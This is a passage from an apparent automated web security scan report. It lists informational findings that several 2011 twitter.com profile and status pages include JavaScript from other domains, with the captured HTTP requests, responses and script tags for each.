http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225006-58314-38201
ETag: "57ff1e9c73248c6fb8e8d467c82b1909"
Last-Modified: Fri, 28 Jan 2011 14:30:06 GMT
X-Runtime: 0.07512
Content-Type: text/html; charset=utf-8
Content-Length: 13712
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlMzc4NTRjMzAw%250AODE3YjBiNmI1MTM5ZjdiNDE2M2E1ZmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--8f776230b304f1b0fa1fdaa92cad95b801a77055; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.355. http://twitter.com/PageLines/status/27898822361354240 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PageLines/status/27898822361354240

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225141-56344-8865
ETag: "9317a5862e354c20c34c5529b8543f1d"
Last-Modified: Fri, 28 Jan 2011 14:32:21 GMT
X-Runtime: 0.08587
Content-Type: text/html; charset=utf-8
Content-Length: 13711
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlZjg4ZjYzYWY0%250ANGQ0MjZjNjI4N2Q3M2I2OGFkMWY5NGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--d578dc9e656e00a8d1ae85091ed5cccb5a63114a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.356. http://twitter.com/PageLines/status/27898822361354240 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PageLines/status/27898822361354240

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234593-67061-20661
ETag: "45bc9184d9294d07117e85f741ef7ba9"
Last-Modified: Fri, 28 Jan 2011 17:09:53 GMT
X-Runtime: 0.08058
Content-Type: text/html; charset=utf-8
Content-Length: 13581
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoVaW5fbmV3X3VzZXJfZmxvdzA6%250ADGNzcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--3a233d9d883576ebfa586c9bb6a6cf2c60630138; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.357. http://twitter.com/PhantomGourmet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PhantomGourmet

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266033-91577-32859
ETag: "161ed10fae22588b3ed41cf62918d8a5"
Last-Modified: Sat, 29 Jan 2011 01:53:53 GMT
X-Runtime: 0.00903
Content-Type: text/html; charset=utf-8
Content-Length: 47996
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.358. http://twitter.com/Prucenter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Prucenter

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248
http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-49777-22631
ETag: "6809b20e173abb1f6aa98709f0f9d6dc"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 52276
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.359. http://twitter.com/PureADK previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PureADK

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-9085-29245
ETag: "6ea59f215eff63985173a556c3c58572"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01097
Content-Type: text/html; charset=utf-8
Content-Length: 57696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.360. http://twitter.com/ROBERTPLANT previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ROBERTPLANT

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-51236-50087
ETag: "2065838d33813f1ed4f56a5980ac687e"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.02165
Content-Type: text/html; charset=utf-8
Content-Length: 21714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.361. http://twitter.com/RealLamarOdom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/RealLamarOdom

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248
http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266006-7436-1947
ETag: "176880d5a04c3fcd8b68fb306d4172bf"
Last-Modified: Sat, 29 Jan 2011 01:53:26 GMT
X-Runtime: 0.01342
Content-Type: text/html; charset=utf-8
Content-Length: 49980
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

